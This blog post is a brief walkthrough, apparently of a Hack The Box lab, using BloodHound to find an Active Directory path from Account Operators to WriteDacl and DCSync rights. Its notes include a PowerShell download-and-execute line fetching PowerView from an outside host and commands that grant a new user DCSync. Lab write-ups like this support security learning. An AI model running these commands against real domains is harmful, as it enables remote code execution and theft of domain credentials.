BloodHound -Attack Path 1

 In this scenario we have our user SVC Alfresco that has access as below.





One of the nested groups is found to be Account Operators, which is a privileged AD group.According to the documentation, members of the Account Operators group are allowed create and modify users and add them to non-protected groups. Let's note this and look at the paths to Domain Admins. Click on Queries and select Shortest Path to High Value targets


One of the paths shows that the Exchange Windows Permissions group has WriteDacl privileges on the Domain. The WriteDACL privilege gives a user the ability to add ACLs to an object. This means that we can add a user to this group and give them DCSync privileges.Go back to the WinRM shell and add a new user to Exchange Windows Permissions as well as the Remote Management Users group.

 

 

 

 

Notes:

 

 

IEX(New-Object net.webclient).downloadstring('http://1.1.1.2/PowerView.ps1')  
$pass = convertto-securestring 'test123!' -asplain -force                        
$cred = new-object system.management.automation.pscredential('htb\sp00ks', $pass)
Add-ObjectACL -PrincipalIdentity sp00ks -Credential $cred -Rights DCSync         
 

 

No comments:

Post a Comment

Subscribe to: Posts (Atom)